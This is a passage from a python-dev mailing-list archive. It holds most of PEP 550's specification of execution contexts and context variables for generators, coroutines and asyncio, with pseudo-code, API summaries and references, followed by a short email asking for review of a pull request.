        var.set('gen')
        assert var.lookup() == 'gen'
        yield 1
        assert var.lookup() == 'gen'
        yield 2

    def main():
        var.set('main')
        g = gen()
        next(g)
        assert var.lookup() == 'main'
        var.set('main modified')
        next(g)
        assert var.lookup() == 'main modified'

Changes to caller's context variables are visible to the generator
(unless they were also modified inside the generator)::

    var = new_context_var()

    def gen():
        assert var.lookup() == 'var'
        yield 1
        assert var.lookup() == 'var modified'
        yield 2

    def main():
        g = gen()

        var.set('var')
        next(g)

        var.set('var modified')
        next(g)

Now, let's revisit the decimal precision example from the
`Rationale`_ section, and see how the execution context can improve
the situation::

    import decimal

    decimal_prec = new_context_var()  # create a new context variable

    # Pre-PEP 550 Decimal relies on TLS for its context.
    # This subclass switches the decimal context storage
    # to the execution context for illustration purposes.
    #
    class MyDecimal(decimal.Decimal):
        def __init__(self, value="0"):
            prec = decimal_prec.lookup()
            if prec is None:
                raise ValueError('could not find decimal precision')
            context = decimal.Context(prec=prec)
            super().__init__(value, context=context)

    def fractions(precision, x, y):
        # Normally, this would be set by a context manager,
        # but for simplicity we do this directly.
        decimal_prec.set(precision)

        yield MyDecimal(x) / MyDecimal(y)
        yield MyDecimal(x) / MyDecimal(y**2)

    g1 = fractions(precision=2, x=1, y=3)
    g2 = fractions(precision=6, x=2, y=3)

    items = list(zip(g1, g2))

The value of ``items`` is::

    [(Decimal('0.33'), Decimal('0.666667')),
     (Decimal('0.11'), Decimal('0.222222'))]

which matches the expected result.


Coroutines and Asynchronous Tasks
---------------------------------

In coroutines, like in generators, context variable changes are
local and are not visible to the caller::

    import asyncio

    var = new_context_var()

    async def sub():
        assert var.lookup() == 'main'
        var.set('sub')
        assert var.lookup() == 'sub'

    async def main():
        var.set('main')
        await sub()
        assert var.lookup() == 'main'

    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())

To establish the full semantics of execution context in coroutines,
we must also consider *tasks*.
A task is the abstraction used by *asyncio* and other similar
libraries to manage the concurrent execution of coroutines.  In the
example above, a task is created implicitly by the
``run_until_complete()`` function.  ``asyncio.wait_for()`` is
another example of implicit task creation::

    async def sub():
        await asyncio.sleep(1)
        assert var.lookup() == 'main'

    async def main():
        var.set('main')

        # waiting for sub() directly
        await sub()

        # waiting for sub() with a timeout
        await asyncio.wait_for(sub(), timeout=2)

        var.set('main changed')

Intuitively, we expect the assertion in ``sub()`` to hold true in
both invocations, even though the ``wait_for()`` implementation
actually spawns a task, which runs ``sub()`` concurrently with
``main()``.

Thus, tasks **must** capture a snapshot of the current execution
context at the moment of their creation and use that snapshot to
execute the wrapped coroutine.  If this is not done, then
innocuous-looking changes like wrapping a coroutine in a
``wait_for()`` call would cause surprising breakage.  This leads to
the following::

    import asyncio

    var = new_context_var()

    async def sub():
        # Sleeping will make sub() run after
        # `var` is modified in main().
        await asyncio.sleep(1)
        assert var.lookup() == 'main'

    async def main():
        var.set('main')
        loop.create_task(sub())  # schedules asynchronous execution
                                 # of sub().
        assert var.lookup() == 'main'
        var.set('main changed')

    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())

In the above code we show how ``sub()``, running in a separate task,
sees the value of ``var`` as it was when ``loop.create_task(sub())``
was called.

Like tasks, the intuitive behaviour of callbacks scheduled with
``Loop.call_soon()``, ``Loop.call_later()``, or
``Future.add_done_callback()`` is to also capture a snapshot of the
current execution context at the point of scheduling, and use it to
run the callback::

    current_request = new_context_var()

    def log_error(e):
        logging.error('error when handling request %r',
                      current_request.lookup())

    async def render_response():
        ...

    async def handle_get_request(request):
        current_request.set(request)
        try:
            return await render_response()
        except Exception as e:
            get_event_loop().call_soon(log_error, e)
            return '500 - Internal Server Error'


Detailed Specification
======================

Conceptually, an *execution context* (EC) is a stack of logical
contexts.  There is one EC per Python thread.

A *logical context* (LC) is a mapping of context variables to their
values in that particular LC.

A *context variable* is an object representing a value in the
execution context.  A new context variable object is created by
calling the ``sys.new_context_var(name: str)`` function.  The value
of the ``name`` argument is not used by the EC machinery, but may be
used for debugging and introspection.

The context variable object has the following methods and
attributes:

* ``name``: the value passed to ``new_context_var()``.

* ``lookup()``: traverses the execution context top-to-bottom until
  the variable's value is found; returns ``None`` if the variable
  is not present in the execution context.

* ``set()``: sets the value of the variable in the topmost logical
  context.
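To make these lookup and set semantics concrete, here is a minimal
pure-Python model of the EC/LC stack described above (ours, for
illustration only; the proposed implementation uses immutable
mappings and lives in C)::

    class ContextVar:

        def __init__(self, name):
            self.name = name

        def lookup(self):
            # Traverse the EC from the topmost LC to the bottom.
            for lc in reversed(_ec):
                if self in lc:
                    return lc[self]
            return None

        def set(self, value):
            # Only the topmost logical context is modified.
            _ec[-1][self] = value

    # The EC of the current thread, modeled as a mutable list of
    # plain dicts; the top of the stack is the end of the list.
    _ec = [{}]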
Generators
----------

When created, each generator object has an empty logical context
object stored in its ``__logical_context__`` attribute.  This
logical context is pushed onto the execution context at the
beginning of each generator iteration and popped at the end::

    var1 = sys.new_context_var('var1')
    var2 = sys.new_context_var('var2')

    def gen():
        var1.set('var1-gen')
        var2.set('var2-gen')

        # EC = [
        #     outer_LC(),
        #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'})
        # ]
        n = nested_gen()  # nested_gen_LC is created
        next(n)
        # EC = [
        #     outer_LC(),
        #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'})
        # ]

        var1.set('var1-gen-mod')
        var2.set('var2-gen-mod')

        # EC = [
        #     outer_LC(),
        #     gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'})
        # ]
        next(n)

    def nested_gen():
        # EC = [
        #     outer_LC(),
        #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'}),
        #     nested_gen_LC()
        # ]
        assert var1.lookup() == 'var1-gen'
        assert var2.lookup() == 'var2-gen'

        var1.set('var1-nested-gen')
        # EC = [
        #     outer_LC(),
        #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'}),
        #     nested_gen_LC({var1: 'var1-nested-gen'})
        # ]
        yield

        # EC = [
        #     outer_LC(),
        #     gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}),
        #     nested_gen_LC({var1: 'var1-nested-gen'})
        # ]
        assert var1.lookup() == 'var1-nested-gen'
        assert var2.lookup() == 'var2-gen-mod'

        yield

    # EC = [outer_LC()]

    g = gen()  # gen_LC is created for the generator object `g`
    list(g)

    # EC = [outer_LC()]

The snippet above shows the state of the execution context stack
throughout the generator lifespan.


contextlib.contextmanager
-------------------------

Earlier, we used the following example::

    import decimal

    # create a new context variable
    decimal_prec = sys.new_context_var('decimal_prec')

    # ...

    def fractions(precision, x, y):
        decimal_prec.set(precision)
        yield MyDecimal(x) / MyDecimal(y)
        yield MyDecimal(x) / MyDecimal(y**2)

Let's extend it by adding a context manager::

    @contextlib.contextmanager
    def precision_context(prec):
        old_prec = decimal_prec.lookup()
        try:
            decimal_prec.set(prec)
            yield
        finally:
            decimal_prec.set(old_prec)

Unfortunately, this would not work straight away, as the
modification to the ``decimal_prec`` variable is confined to the
``precision_context()`` generator, and therefore will not be visible
inside the ``with`` block::

    def fractions(precision, x, y):
        # EC = [{}, {}]

        with precision_context(precision):
            # EC becomes [{}, {}, {decimal_prec: precision}] in the
            # *precision_context()* generator,
            # but here the EC is still [{}, {}]

            # raises ValueError('could not find decimal precision')!
            yield MyDecimal(x) / MyDecimal(y)
            yield MyDecimal(x) / MyDecimal(y**2)

The way to fix this is to set the generator's
``__logical_context__`` attribute to ``None``.  This will cause the
generator to avoid modifying the execution context stack.

We modify the ``contextlib.contextmanager()`` decorator to set
``genobj.__logical_context__`` to ``None`` to produce well-behaved
context managers (a sketch of that change follows the example
below)::

    def fractions(precision, x, y):
        # EC = [{}, {}]

        with precision_context(precision):
            # EC = [{}, {decimal_prec: precision}]

            yield MyDecimal(x) / MyDecimal(y)
            yield MyDecimal(x) / MyDecimal(y**2)

        # EC becomes [{}, {decimal_prec: None}]
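A minimal sketch of the decorator change, assuming a simplified
stand-in for contextlib's internal helper (the real change would
patch ``contextlib._GeneratorContextManager``; the stub class name
below is ours)::

    import functools

    def contextmanager(func):
        @functools.wraps(func)
        def helper(*args, **kwds):
            gen = func(*args, **kwds)
            # Opt the generator out of logical-context isolation:
            # set() calls made before and after its `yield` now
            # target the caller's topmost logical context.
            gen.__logical_context__ = None
            return _GeneratorContextManagerStub(gen)
        return helper

Here ``_GeneratorContextManagerStub`` stands in for the existing
``__enter__``/``__exit__`` driver; only the ``__logical_context__``
assignment is new behaviour.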
asyncio
-------

``asyncio`` uses ``Loop.call_soon``, ``Loop.call_later``, and
``Loop.call_at`` to schedule the asynchronous execution of a
function.  ``asyncio.Task`` uses ``call_soon()`` to further the
execution of the wrapped coroutine.

We modify ``Loop.call_{at,later,soon}`` to accept the new optional
*execution_context* keyword argument, which defaults to a copy of
the current execution context::

    def call_soon(self, callback, *args, execution_context=None):
        if execution_context is None:
            execution_context = sys.get_execution_context()

        # ... some time later
        sys.run_with_execution_context(
            execution_context, callback, args)

The ``sys.get_execution_context()`` function returns a shallow copy
of the current execution context.  By shallow copy here we mean a
new execution context such that:

* lookups in the copy provide the same results as in the original
  execution context, and

* any changes in the original execution context do not affect the
  copy, and

* any changes to the copy do not affect the original execution
  context.

Either of the following satisfies the copy requirements:

* a new stack with shallow copies of logical contexts;

* a new stack with one squashed logical context.

The ``sys.run_with_execution_context(ec, func, *args, **kwargs)``
function runs ``func(*args, **kwargs)`` with *ec* as the execution
context.  The function performs the following steps:

1. Set *ec* as the current execution context stack in the current
   thread.

2. Push an empty logical context onto the stack.

3. Run ``func(*args, **kwargs)``.

4. Pop the logical context from the stack.

5. Restore the original execution context stack.

6. Return or raise the ``func()`` result.

These steps ensure that *ec* cannot be modified by *func*, which
makes ``run_with_execution_context()`` idempotent.

``asyncio.Task`` is modified as follows::

    class Task:
        def __init__(self, coro):
            ...
            # Get the current execution context snapshot.
            self._exec_context = sys.get_execution_context()
            self._loop.call_soon(
                self._step,
                execution_context=self._exec_context)

        def _step(self, exc=None):
            ...
            self._loop.call_soon(
                self._step,
                execution_context=self._exec_context)
            ...
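Application code can also pin an explicitly captured context with
the new keyword argument; ``refresh_cache`` below is a hypothetical
callback used only for illustration::

    # Capture the EC now and run the callback in it later, even if
    # the current context has changed by the time the callback runs.
    ec = sys.get_execution_context()
    loop.call_later(5.0, refresh_cache, execution_context=ec)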
Generators Transformed into Iterators
-------------------------------------

Any Python generator can be represented as an equivalent iterator.
Compilers like Cython rely on this axiom.  With respect to the
execution context, such an iterator should behave the same way as
the generator it represents.

This means that there needs to be a Python API to create new logical
contexts and run code with a given logical context.

The ``sys.new_logical_context()`` function creates a new empty
logical context.

The ``sys.run_with_logical_context(lc, func, *args, **kwargs)``
function can be used to run functions in the specified logical
context.  The *lc* can be modified as a result of the call.

The ``sys.run_with_logical_context()`` function performs the
following steps:

1. Push *lc* onto the current execution context stack.

2. Run ``func(*args, **kwargs)``.

3. Pop *lc* from the execution context stack.

4. Return or raise the ``func()`` result.

By using ``new_logical_context()`` and
``run_with_logical_context()``, we can replicate the generator
behaviour like this::

    class Generator:

        def __init__(self):
            self.logical_context = sys.new_logical_context()

        def __iter__(self):
            return self

        def __next__(self):
            return sys.run_with_logical_context(
                self.logical_context, self._next_impl)

        def _next_impl(self):
            # Actual __next__ implementation.
            ...

Let's see how this pattern can be applied to a real generator::

    # create a new context variable
    decimal_prec = sys.new_context_var('decimal_precision')

    def gen_series(n, precision):
        decimal_prec.set(precision)

        for i in range(1, n):
            yield MyDecimal(i) / MyDecimal(3)

    # gen_series is equivalent to the following iterator:

    class Series:

        def __init__(self, n, precision):
            # Create a new empty logical context on creation,
            # like the generators do.
            self.logical_context = sys.new_logical_context()

            # run_with_logical_context() pushes
            # self.logical_context onto the execution context
            # stack, runs self._init, and pops
            # self.logical_context from the stack.
            sys.run_with_logical_context(
                self.logical_context, self._init, n, precision)

        def _init(self, n, precision):
            self.i = 1
            self.n = n
            self.precision = precision
            decimal_prec.set(precision)

        def __iter__(self):
            return self

        def __next__(self):
            return sys.run_with_logical_context(
                self.logical_context, self._next_impl)

        def _next_impl(self):
            decimal_prec.set(self.precision)
            result = MyDecimal(self.i) / MyDecimal(3)
            self.i += 1
            return result

For regular iterators such an approach to logical context management
is normally not necessary, and it is recommended to set and restore
context variables directly in ``__next__``::

    class Series:

        def __next__(self):
            old_prec = decimal_prec.lookup()
            try:
                decimal_prec.set(self.precision)
                ...
            finally:
                decimal_prec.set(old_prec)


Asynchronous Generators
-----------------------

The execution context semantics in asynchronous generators do not
differ from those of regular generators and coroutines.
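As a brief illustration using the APIs proposed above, the generator
example from the High-Level Specification carries over unchanged
(this sketch is ours)::

    var = sys.new_context_var('var')

    async def agen():
        var.set('agen')
        yield 1
        # 'agen' still shadows the caller's later change, because
        # `var` was also set inside this asynchronous generator.
        assert var.lookup() == 'agen'
        yield 2

    async def main():
        var.set('main')
        g = agen()
        await g.__anext__()
        assert var.lookup() == 'main'  # agen()'s change is isolated
        var.set('main modified')
        await g.__anext__()

    asyncio.get_event_loop().run_until_complete(main())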
Implementation
==============

Execution context is implemented as an immutable linked list of
logical contexts, where each logical context is an immutable weak
key mapping.  A pointer to the currently active execution context is
stored in the OS thread state::

    +-----------------+
    |                 |  ec
    |  PyThreadState  +----------------------------------------+
    |                 |                                        |
    +-----------------+                                        |
                                                               |
        ec_node              ec_node              ec_node      |
    +------+------+     +------+------+     +------+------+    |
    | NULL |  lc  |<----| prev |  lc  |<----| prev |  lc  |<---+
    +------+--+---+     +------+--+---+     +------+--+---+
              |                    |                    |
     LC       v           LC       v           LC       v
    +-------------+     +-------------+     +-------------+
    | var1: obj1  |     |    EMPTY    |     | var1: obj4  |
    | var2: obj2  |     +-------------+     +-------------+
    | var3: obj3  |
    +-------------+

The choice of the immutable list of immutable mappings as a
fundamental data structure is motivated by the need to efficiently
implement ``sys.get_execution_context()``, which is to be frequently
used by asynchronous tasks and callbacks.  When the EC is immutable,
``get_execution_context()`` can simply copy the current execution
context *by reference*::

    def get_execution_context(self):
        return PyThreadState_Get().ec

Let's review all possible context modification scenarios:

* The ``ContextVar.set()`` method is called::

    def ContextVar_set(self, val):
        # See a more complete set() definition
        # in the `Context Variables` section.

        tstate = PyThreadState_Get()
        top_ec_node = tstate.ec
        top_lc = top_ec_node.lc
        new_top_lc = top_lc.set(self, val)
        tstate.ec = ec_node(
            prev=top_ec_node.prev, lc=new_top_lc)

* ``sys.run_with_logical_context()`` is called, in which case the
  passed logical context object is appended to the execution
  context::

    def run_with_logical_context(lc, func, *args, **kwargs):
        tstate = PyThreadState_Get()

        old_top_ec_node = tstate.ec
        new_top_ec_node = ec_node(prev=old_top_ec_node, lc=lc)

        try:
            tstate.ec = new_top_ec_node
            return func(*args, **kwargs)
        finally:
            tstate.ec = old_top_ec_node

* ``sys.run_with_execution_context()`` is called, in which case the
  current execution context is set to the passed execution context
  with a new empty logical context appended to it::

    def run_with_execution_context(ec, func, *args, **kwargs):
        tstate = PyThreadState_Get()

        old_top_ec_node = tstate.ec
        new_lc = sys.new_logical_context()
        new_top_ec_node = ec_node(prev=ec, lc=new_lc)

        try:
            tstate.ec = new_top_ec_node
            return func(*args, **kwargs)
        finally:
            tstate.ec = old_top_ec_node

* Any of ``genobj.send()``, ``genobj.throw()``, or
  ``genobj.close()`` is called on a ``genobj`` generator, in which
  case the logical context recorded in ``genobj`` is pushed onto the
  stack::

    PyGen_New(PyGenObject *gen):
        gen.__logical_context__ = sys.new_logical_context()

    gen_send(PyGenObject *gen, ...):
        tstate = PyThreadState_Get()

        if gen.__logical_context__ is not None:
            old_top_ec_node = tstate.ec
            new_top_ec_node = ec_node(
                prev=old_top_ec_node,
                lc=gen.__logical_context__)

            try:
                tstate.ec = new_top_ec_node
                return _gen_send_impl(gen, ...)
            finally:
                gen.__logical_context__ = tstate.ec.lc
                tstate.ec = old_top_ec_node
        else:
            return _gen_send_impl(gen, ...)

* Coroutines and asynchronous generators share the implementation
  with generators, and the above changes apply to them as well.

In certain scenarios the EC may need to be squashed to limit the
size of the chain.  For example, consider the following corner
case::

    async def repeat(coro, delay):
        await coro()
        await asyncio.sleep(delay)
        loop.create_task(repeat(coro, delay))

    async def ping():
        print('ping')

    loop = asyncio.get_event_loop()
    loop.create_task(repeat(ping, 1))
    loop.run_forever()

In the above code, the EC chain keeps growing for as long as
``repeat()`` keeps rescheduling itself.  Each new task calls
``sys.run_with_execution_context()``, which appends a new logical
context to the chain.  To prevent unbounded growth,
``sys.get_execution_context()`` checks if the chain is longer than
a predetermined maximum, and if it is, squashes the chain into a
single LC::

    def get_execution_context():
        tstate = PyThreadState_Get()

        if tstate.ec_len > EC_LEN_MAX:
            squashed_lc = sys.new_logical_context()

            ec_node = tstate.ec
            while ec_node:
                # The LC.merge() method does not replace
                # existing keys.
                squashed_lc = squashed_lc.merge(ec_node.lc)
                ec_node = ec_node.prev

            return ec_node(prev=NULL, lc=squashed_lc)
        else:
            return tstate.ec
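The merge order matters here: the walk starts at the topmost logical
context, and because ``merge()`` never replaces keys that are
already present, values from newer contexts win.  A toy dict-based
equivalent of that invariant (ours, for illustration)::

    def merge(squashed, lc):
        # Keep existing keys: values merged earlier (i.e. from
        # newer, topmost logical contexts) take precedence.
        out = dict(squashed)
        for key, value in lc.items():
            out.setdefault(key, value)
        return out

    ec = [{'var1': 'old', 'var2': 'x'},   # bottom LC
          {'var1': 'new'}]                # top LC

    squashed = {}
    for lc in reversed(ec):               # walk top to bottom
        squashed = merge(squashed, lc)

    assert squashed == {'var1': 'new', 'var2': 'x'}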
Logical Context
---------------

Logical context is an immutable weak key mapping which has the
following properties with respect to garbage collection:

* ``ContextVar`` objects are strongly referenced only from the
  application code, not from any of the Execution Context machinery
  or values they point to.  This means that there are no reference
  cycles that could extend their lifespan longer than necessary, or
  prevent their collection by the GC.

* Values put in the Execution Context are guaranteed to be kept
  alive while there is a ``ContextVar`` key referencing them in the
  thread.

* If a ``ContextVar`` is garbage collected, all of its values will
  be removed from all contexts, allowing them to be GCed if needed.

* If a thread has ended its execution, its thread state will be
  cleaned up along with its ``ExecutionContext``, cleaning up all
  values bound to all context variables in the thread.

As discussed earlier, we need ``sys.get_execution_context()`` to be
consistently fast regardless of the size of the execution context,
so logical context is necessarily an immutable mapping.

Choosing ``dict`` for the underlying implementation is suboptimal,
because ``LC.set()`` will cause ``dict.copy()``, which is an O(N)
operation, where *N* is the number of items in the LC.

``get_execution_context()``, when squashing the EC, is an O(M)
operation, where *M* is the total number of context variable values
in the EC.

So, instead of ``dict``, we choose Hash Array Mapped Trie (HAMT) as
the underlying implementation of logical contexts.  (Scala and
Clojure use HAMT to implement high-performance immutable collections
[5]_, [6]_.)

With HAMT ``.set()`` becomes an O(log N) operation, and
``get_execution_context()`` squashing is more efficient on average
due to structural sharing in HAMT.

See `Appendix: HAMT Performance Analysis`_ for a more elaborate
analysis of HAMT performance compared to ``dict``.


Context Variables
-----------------

The ``ContextVar.lookup()`` and ``ContextVar.set()`` methods are
implemented as follows (in pseudo-code)::

    class ContextVar:

        def lookup(self):
            tstate = PyThreadState_Get()

            ec_node = tstate.ec
            while ec_node:
                if self in ec_node.lc:
                    return ec_node.lc[self]
                ec_node = ec_node.prev

            return None

        def set(self, value):
            tstate = PyThreadState_Get()
            top_ec_node = tstate.ec

            if top_ec_node is not None:
                top_lc = top_ec_node.lc
                new_top_lc = top_lc.set(self, value)
                tstate.ec = ec_node(
                    prev=top_ec_node.prev, lc=new_top_lc)
            else:
                top_lc = sys.new_logical_context()
                new_top_lc = top_lc.set(self, value)
                tstate.ec = ec_node(
                    prev=NULL, lc=new_top_lc)

For efficient access in performance-sensitive code paths, such as
in ``numpy`` and ``decimal``, we add a cache to
``ContextVar.lookup()``, making it an O(1) operation when the cache
is hit.  The cache key is composed from the following:

* The new ``uint64_t PyThreadState->unique_id``, which is a globally
  unique thread state identifier.  It is computed from the new
  ``uint64_t PyInterpreterState->ts_counter``, which is incremented
  whenever a new thread state is created.

* The ``uint64_t ContextVar->version`` counter, which is incremented
  whenever the context variable value is changed in any logical
  context in any thread.

The cache is then implemented as follows::

    class ContextVar:

        def set(self, value):
            ...  # implementation
            self.version += 1

        def lookup(self):
            tstate = PyThreadState_Get()

            if (self.last_tstate_id == tstate.unique_id and
                    self.last_version == self.version):
                return self.last_value

            value = self._lookup_uncached()

            self.last_value = value  # borrowed ref
            self.last_tstate_id = tstate.unique_id
            self.last_version = self.version

            return value

Note that ``last_value`` is a borrowed reference.  The assumption is
that if the version checks are fine, the object will be alive.  This
allows the values of context variables to be properly garbage
collected.

This generic caching approach is similar to what the current C
implementation of ``decimal`` does to cache the current decimal
context, and has similar performance characteristics.
Performance Considerations
==========================

Tests of the reference implementation based on the prior revisions
of this PEP have shown a 1-2% slowdown on generator microbenchmarks
and no noticeable difference in macrobenchmarks.

The performance of non-generator and non-async code is not affected
by this PEP.


Summary of the New APIs
=======================

Python
------

The following new Python APIs are introduced by this PEP:

1. The ``sys.new_context_var(name: str)`` function to create
   ``ContextVar`` objects.

2. The ``ContextVar`` object, which has:

   * the read-only ``.name`` attribute;

   * the ``.lookup()`` method, which returns the value of the
     variable in the current execution context;

   * the ``.set()`` method, which sets the value of the variable
     in the current execution context.

3. The ``sys.get_execution_context()`` function, which returns a
   copy of the current execution context.

4. The ``sys.new_execution_context()`` function, which returns a
   new empty execution context.

5. The ``sys.new_logical_context()`` function, which returns a new
   empty logical context.

6. The ``sys.run_with_execution_context(ec: ExecutionContext, func,
   *args, **kwargs)`` function, which runs *func* with the provided
   execution context.

7. The ``sys.run_with_logical_context(lc: LogicalContext, func,
   *args, **kwargs)`` function, which runs *func* with the provided
   logical context on top of the current execution context.
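A short sketch of how these functions compose (``some_function`` is
a placeholder; semantics as specified above)::

    var = sys.new_context_var('var')
    var.set(42)
    assert var.lookup() == 42

    # Capture the current EC and run a function within it later.
    ec = sys.get_execution_context()
    sys.run_with_execution_context(ec, some_function)

    # Run a function with a given logical context pushed on top of
    # the current EC; its set() calls land in `lc`.
    lc = sys.new_logical_context()
    sys.run_with_logical_context(lc, some_function)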
C API
-----

1. ``PyContextVar * PyContext_NewVar(char *desc)``: create a
   ``PyContextVar`` object.

2. ``PyObject * PyContext_LookupVar(PyContextVar *)``: return the
   value of the variable in the current execution context.

3. ``int PyContext_SetVar(PyContextVar *, PyObject *)``: set the
   value of the variable in the current execution context.

4. ``PyLogicalContext * PyLogicalContext_New()``: create a new
   empty ``PyLogicalContext``.

5. ``PyExecutionContext * PyExecutionContext_New()``: create a new
   empty ``PyExecutionContext``.

6. ``PyExecutionContext * PyExecutionContext_Get()``: return the
   current execution context.

7. ``int PyExecutionContext_Set(PyExecutionContext *)``: set the
   passed EC object as the current one for the active thread state.

8. ``int PyExecutionContext_SetWithLogicalContext(PyExecutionContext *,
   PyLogicalContext *)``: allows implementing the
   ``sys.run_with_logical_context`` Python API.


Design Considerations
=====================

Should ``PyThreadState_GetDict()`` use the execution context?
-------------------------------------------------------------

No.  ``PyThreadState_GetDict`` is based on TLS, and changing its
semantics will break backwards compatibility.


PEP 521
-------

:pep:`521` proposes an alternative solution to the problem, which
extends the context manager protocol with two new methods:
``__suspend__()`` and ``__resume__()``.  Similarly, the asynchronous
context manager protocol is also extended with ``__asuspend__()``
and ``__aresume__()``.

This allows implementing context managers that manage non-local
state, which behave correctly in generators and coroutines.

For example, consider the following context manager, which uses the
execution context::

    class Context:

        def __init__(self):
            self.var = new_context_var('var')

        def __enter__(self):
            self.old_x = self.var.lookup()
            self.var.set('something')

        def __exit__(self, *err):
            self.var.set(self.old_x)

An equivalent implementation with PEP 521::

    local = threading.local()

    class Context:

        def __enter__(self):
            self.old_x = getattr(local, 'x', None)
            local.x = 'something'

        def __suspend__(self):
            local.x = self.old_x

        def __resume__(self):
            local.x = 'something'

        def __exit__(self, *err):
            local.x = self.old_x

The downside of this approach is the addition of significant new
complexity to the context manager protocol and the interpreter
implementation.  This approach is also likely to negatively impact
the performance of generators and coroutines.

Additionally, the solution in :pep:`521` is limited to context
managers, and does not provide any mechanism to propagate state in
asynchronous tasks and callbacks.


Can Execution Context be implemented outside of CPython?
--------------------------------------------------------

No.  Proper generator behaviour with respect to the execution
context requires changes to the interpreter.


Should we update sys.displayhook and other APIs to use EC?
----------------------------------------------------------

APIs like redirecting stdout by overwriting ``sys.stdout``, or
specifying new exception display hooks by overwriting the
``sys.displayhook`` function, affect the whole Python process **by
design**.  Their users assume that the effect of changing them will
be visible across OS threads.  Therefore, we cannot simply make
these APIs use the new Execution Context.

That said, we think it is possible to design new APIs that will be
context-aware, but that is outside the scope of this PEP.


Greenlets
---------

Greenlet is an alternative implementation of cooperative scheduling
for Python.  Although the greenlet package is not part of CPython,
popular frameworks like gevent rely on it, and it is important that
greenlet can be modified to support execution contexts.

Conceptually, the behaviour of greenlets is very similar to that of
generators, which means that similar changes around greenlet entry
and exit can be made to add support for the execution context.


Backwards Compatibility
=======================

This proposal preserves 100% backwards compatibility.


Appendix: HAMT Performance Analysis
===================================

.. figure:: pep-0550-hamt_vs_dict-v2.png
   :align: center
   :width: 100%

   Figure 1.  Benchmark code can be found here: [9]_.

The above chart demonstrates that:

* HAMT displays near-O(1) performance for all benchmarked
  dictionary sizes.

* ``dict.copy()`` becomes very slow around 100 items.

.. figure:: pep-0550-lookup_hamt.png
   :align: center
   :width: 100%

   Figure 2.  Benchmark code can be found here: [10]_.

Figure 2 compares the lookup costs of ``dict`` versus a HAMT-based
immutable mapping.  HAMT lookup time is 30-40% slower than Python
dict lookups on average, which is a very good result, considering
that the latter is very well optimized.

There is research [8]_ showing that there are further possible
improvements to the performance of HAMT.

The reference implementation of HAMT for CPython can be found
here: [7]_.


Acknowledgments
===============

Thanks to Victor Petrovykh for countless discussions around the
topic and PEP proofreading and edits.
Thanks to Nathaniel Smith for proposing the ``ContextVar`` design
[17]_ [18]_, for pushing the PEP towards a more complete design, and
for coming up with the idea of having a stack of contexts in the
thread state.

Thanks to Nick Coghlan for numerous suggestions and ideas on the
mailing list, and for coming up with a case that caused the complete
rewrite of the initial PEP version [19]_.


Version History
===============

1. Initial revision, posted on 11-Aug-2017 [20]_.

2. V2 posted on 15-Aug-2017 [21]_.

   The fundamental limitation that caused a complete redesign of the
   first version was that it was not possible to implement an
   iterator that would interact with the EC in the same way as
   generators (see [19]_.)

   Version 2 was a complete rewrite, introducing new terminology
   (Local Context, Execution Context, Context Item) and new APIs.

3. V3 posted on 18-Aug-2017 [22]_.  Updates:

   * Local Context was renamed to Logical Context.  The term
     "local" was ambiguous and conflicted with local name scopes.

   * Context Item was renamed to Context Key; see the thread with
     Nick Coghlan, Stefan Krah, and Yury Selivanov [23]_ for
     details.

   * The Context Item get cache design was adjusted, per Nathaniel
     Smith's idea in [25]_.

   * Coroutines are created without a Logical Context; the ceval
     loop no longer needs to special-case the ``await`` expression
     (proposed by Nick Coghlan in [24]_.)

4. V4 posted on 25-Aug-2017: the current version.

   * The specification section has been completely rewritten.

   * Context Key was renamed to Context Var.

   * Removed the distinction between generators and coroutines with
     respect to logical context isolation.


References
==========

.. [1] https://blog.golang.org/context

.. [2] https://msdn.microsoft.com/en-us/library/system.threading.executioncontext.aspx

.. [3] https://github.com/numpy/numpy/issues/9444

.. [4] http://bugs.python.org/issue31179

.. [5] https://en.wikipedia.org/wiki/Hash_array_mapped_trie

.. [6] http://blog.higher-order.net/2010/08/16/assoc-and-clojures-persistenthashmap-part-ii.html

.. [7] https://github.com/1st1/cpython/tree/hamt

.. [8] https://michael.steindorfer.name/publications/oopsla15.pdf

.. [9] https://gist.github.com/1st1/9004813d5576c96529527d44c5457dcd

.. [10] https://gist.github.com/1st1/dbe27f2e14c30cce6f0b5fddfc8c437e

.. [11] https://github.com/1st1/cpython/tree/pep550

.. [12] https://www.python.org/dev/peps/pep-0492/#async-await

.. [13] https://github.com/MagicStack/uvloop/blob/master/examples/bench/echoserver.py

.. [14] https://github.com/MagicStack/pgbench

.. [15] https://github.com/python/performance

.. [16] https://gist.github.com/1st1/6b7a614643f91ead3edf37c4451a6b4c

.. [17] https://mail.python.org/pipermail/python-ideas/2017-August/046752.html

.. [18] https://mail.python.org/pipermail/python-ideas/2017-August/046772.html

.. [19] https://mail.python.org/pipermail/python-ideas/2017-August/046775.html

.. [20] https://github.com/python/peps/blob/e8a06c9a790f39451d9e99e203b13b3ad73a1d01/pep-0550.rst

.. [21] https://github.com/python/peps/blob/e3aa3b2b4e4e9967d28a10827eed1e9e5960c175/pep-0550.rst

.. [22] https://github.com/python/peps/blob/287ed87bb475a7da657f950b353c71c1248f67e7/pep-0550.rst

.. [23] https://mail.python.org/pipermail/python-ideas/2017-August/046801.html

.. [24] https://mail.python.org/pipermail/python-ideas/2017-August/046790.html

.. [25] https://mail.python.org/pipermail/python-ideas/2017-August/046786.html


Copyright
=========

This document has been placed in the public domain.
From py.lessard at gmail.com  Fri Aug 25 21:09:19 2017
From: py.lessard at gmail.com (Pier-Yves Lessard)
Date: Fri, 25 Aug 2017 21:09:19 -0400
Subject: [Python-Dev] bpo-30987 review
Message-ID:

Hello there!

I created a pull request almost a month ago that seems to have
received very little attention, and I was wondering what could be
done (if anything).

The approach suggested on the "Lifecycle of a pull request" page is
to wait for a month and then remind the nosy list.  Unfortunately, I
am the only one on the nosy list, so I skipped to this email
directly.

I saw some pull requests more recent than mine getting looked at, so
I thought maybe something was wrong with mine.  In any case, let me
know if I can do anything to help on that.

The feature I added will unlock some quite nice features for the
automotive industry.

Thank you, and keep up the awesome work!

--
*Pier-Yves Lessard*
*438-862-5914*

From jimjjewett at gmail.com  Fri Aug 25 21:45:42 2017
From: jimjjewett at gmail.com (Jim J. Jewett)
Date: Fri, 25 Aug 2017 21:45:42 -0400
